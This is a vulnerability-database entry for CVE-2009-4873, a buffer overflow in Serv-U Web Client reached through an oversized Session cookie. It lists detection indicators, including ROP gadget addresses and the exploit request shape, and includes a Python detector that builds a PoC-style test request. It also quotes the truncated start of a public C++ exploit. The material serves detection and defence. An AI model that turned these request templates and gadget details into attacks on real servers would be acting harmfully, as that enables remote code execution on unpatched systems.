CVE-2009-4873
Published 2010-05-26
Priority: P2 (67) · Severity: critical · CVSS 2.0 base score: 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 20.55% (97.2nd percentile)
Stack-based buffer overflow in the HTTP server in Rhino Software Serv-U Web Client 9.0.0.5 allows remote attackers to cause a denial of service (server crash) or execute arbitrary code via a long Session cookie.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rhinosoft | serv-u | — | — |
Detection & IOCs (extracted from sources)
- Cookie: Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8<oversized payload>
- Detect HTTP POST requests to port 80 whose 'Session' cookie value exceeds normal length (e.g. >1000 bytes) and starts with '_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814'.
- Alert on HTTP POST requests whose Cookie header contains both 'killmenothing' and an oversized 'Session=' field; this exact combination appears in both public exploit PoCs.
- Monitor for the ROP gadget address 0x961ea378 (pop esi; ret from mfc90u.dll) in HTTP POST body payloads, used for DEP bypass on Windows 2003 R2 SP2.
- Monitor for the ROP gadget address 0x4928b00f (add esp, 0x???; ret) embedded within the Session cookie payload at offset (41000-62)*2+20.
- Detect the infinite-loop shellcode stub 0xebfe (JMP $-2, a two-byte jump to itself) embedded in HTTP POST payloads at offset 48 within the Session cookie field.
- Flag HTTP POST requests with Content-Type 'multipart/form-data' and Content-Length 0 combined with an abnormally large Cookie header; this is the exact request structure used by both PoC exploits.

Caveats
- The exploit targets port 80 (HTTP); if the Serv-U WebClient is configured on a non-standard port, detection rules must be adjusted accordingly.
- The DEP bypass ROP chain (mfc90u.dll gadgets) is specific to a fully patched Windows Server 2003 R2 SP2; the exploit may behave differently or fail on other OS versions.
- The recommended workaround is to disable the WebClient service entirely and rely on the FTP/SFTP components only, which removes the HTTP attack surface.
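As an added example (not code from this page, the PoC authors or Rhino Software), the following Python applies the indicators listed above to two constructed HTTP requests: one benign, one built in the shape of the public PoC request. The indicator strings, thresholds and gadget addresses are the ones in the list; the Cookie-header size threshold, the assumption that gadget addresses travel as raw little-endian dwords, the filler payload bytes and the host address are assumptions of this example.

```python
"""Apply the CVE-2009-4873 indicators listed above to raw HTTP requests.
Added example, not code from the page, the PoC authors or Rhino Software.
Values marked 'assumption' are mine; the rest come from the IOC list."""
import struct
from typing import Dict, List, Tuple

SESSION_PREFIX = ("_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa0936"
                  "1bd7f8948c8d1adf4bd4f6c1c198eb9507545814")   # from the IOC list
SESSION_LEN_THRESHOLD = 1000     # IOC list: "exceeding normal length (e.g., >1000 bytes)"
COOKIE_HEADER_THRESHOLD = 4096   # assumption: what counts as an "abnormally large Cookie header"
JMP_SELF_STUB = b"\xeb\xfe"      # IOC list: JMP $-2, a two-byte jump to itself
ROP_GADGETS = {                  # IOC list: gadget addresses seen in the PoC payloads
    0x961ea378: "pop esi; ret (mfc90u.dll)",
    0x4928b00f: "add esp, ...; ret",
}


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into (method, headers, body).
    Headers are decoded as latin-1 so every byte survives unchanged; names are
    lower-cased and repeated headers joined, so a split Cookie header is one string."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0] if lines[0] else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue                       # tolerate a malformed header line
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        if name in headers:
            headers[name] += ("; " if name == "cookie" else ", ") + value
        else:
            headers[name] = value
    return method, headers, body


def parse_cookies(cookie_header: str) -> Dict[str, str]:
    """Cookie name -> value. A bare token such as 'killmenothing' (no '=')
    is kept with an empty value so its presence can be tested."""
    cookies: Dict[str, str] = {}
    for part in cookie_header.split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


def find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Every offset at which needle occurs in haystack."""
    offsets, pos = [], haystack.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = haystack.find(needle, pos + 1)
    return offsets


def detect(raw: bytes) -> List[str]:
    """Return the indicators from the list above that match this request.
    Port-agnostic on purpose: it inspects the request, not the socket."""
    method, headers, body = parse_request(raw)
    cookie_header = headers.get("cookie", "")
    cookies = parse_cookies(cookie_header)
    session = cookies.get("Session", "").encode("latin-1")
    findings: List[str] = []
    oversized = len(session) > SESSION_LEN_THRESHOLD
    if method == "POST" and oversized and session.startswith(SESSION_PREFIX.encode()):
        findings.append("oversized Session cookie with known prefix")
    if method == "POST" and oversized and "killmenothing" in cookies:
        findings.append("killmenothing + oversized Session")
    if (method == "POST"
            and headers.get("content-type", "").lower().startswith("multipart/form-data")
            and headers.get("content-length", "") == "0"
            and len(cookie_header) > COOKIE_HEADER_THRESHOLD):
        findings.append("multipart POST, Content-Length 0, oversized Cookie")
    for off in find_all(session, JMP_SELF_STUB):
        findings.append(f"JMP $-2 stub in Session at offset {off}")
    # Assumption: gadget addresses travel as raw little-endian dwords; scan cookie and body.
    for addr, name in ROP_GADGETS.items():
        needle = struct.pack("<I", addr)
        if needle in session or needle in body:
            findings.append(f"ROP gadget 0x{addr:08x} ({name})")
    return findings


def build_poc_style_request(host: bytes = b"192.0.2.10") -> bytes:
    """Constructed request in the shape of the public PoC: the page's Session
    prefix followed by a filler payload carrying the JMP $-2 stub and one gadget
    address. The filler bytes and host are mine, not the real exploit data."""
    payload = (b"A" * 48 + JMP_SELF_STUB + b"A" * 8000
               + struct.pack("<I", 0x4928b00f) + b"A" * 16)
    return (b"POST / HTTP/1.1\r\nHost: " + host + b"\r\n"
            b"Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session="
            + SESSION_PREFIX.encode() + payload + b"\r\n"
            b"Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
            b"Content-Length: 0\r\n\r\n")


# Constructed benign request: a normal-sized Session cookie and no payload.
BENIGN_REQUEST = (b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                  b"Cookie: SULang=en%2CUS; themename=vista; Session="
                  + b"0123456789abcdef" * 4 + b"\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("poc-style", build_poc_style_request())):
        print(label, detect(req) or "no findings")
```

Running the module prints the findings for both requests. Because `detect()` parses the request itself rather than keying on port 80, the same function works when the WebClient listens on a non-standard port. The 0xebfe scan reports every offset at which the stub occurs in the Session value, so the offset a sensor actually observes can be compared with the one given in the list above rather than hard-coded.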
No detection rules found.
Exploit-DB
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2) (exploitdb · 2009-11-05 · CVE-2009-4873)
---
```cpp
/*
!!!FOR EDUCATIONAL USE ONLY!!!
M.Yanagishita Nov 2, 2009
!!!FOR EDUCATIONAL USE ONLY!!!
*/
#include <stdio.h>     /* header names were stripped by the page's HTML extraction; restored */
#include <winsock2.h>  /* WSADATA, SOCKET, hostent, sockaddr_in */
#pragma comment(lib, "ws2_32")
#define Die(a) if(a){return;}

/* Request in the shape the WebClient accepts: a POST with an empty multipart body.
   The oversized data is carried in the Session cookie, after the fixed prefix. */
char request[] =
"POST / HTTP/1.1\r\nHost: %s\r\nCookie: killmenothing; SULang=de%%2CDE; themename=vista;"
" Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814%s\r\n"
"Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\nContent-Length: 0\r\n\r\n";

void main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int len, sent, r;
char *buf = new char[120000];
char *payload = new char[100000];
Die(argc < 2);
/* The lines between this check and an assignment from he->h_addr were lost in
   extraction (the '<' of "argc<2" was treated as an HTML tag); the listing is
   truncated in the source at the socket() call below. */
Die((s
```
Exploit-DB
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1) (exploitdb · 2009-11-02 · CVE-2009-4873)
---
-- KC Security PUBLIC ADVISORY -- http://www.rangos.de --
11-01-2009
RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow
Background
Serv-U includes a simple, browser-based transfer client perfect
for every business environment. The Web Client is accessed through
a standard web browser and features an unintimidating, familiar interface.
It is a great way for sharing photos and image files with clients and
co-workers due to its configurable thumbnail view that allows remote
images to be quickly viewed without downloading the entire file.
An additional slideshow view offers a fast way to share a collection
of photos from your latest projects. When using Serv-U, photo sharing
sites and large email attachments are a thi
No writeups or analysis indexed.
References
- http://secunia.com/advisories/37228
- http://www.rangos.de/ServU-ADV.txt
- http://www.securityfocus.com/bid/36895
- http://www.vupen.com/english/advisories/2009/3116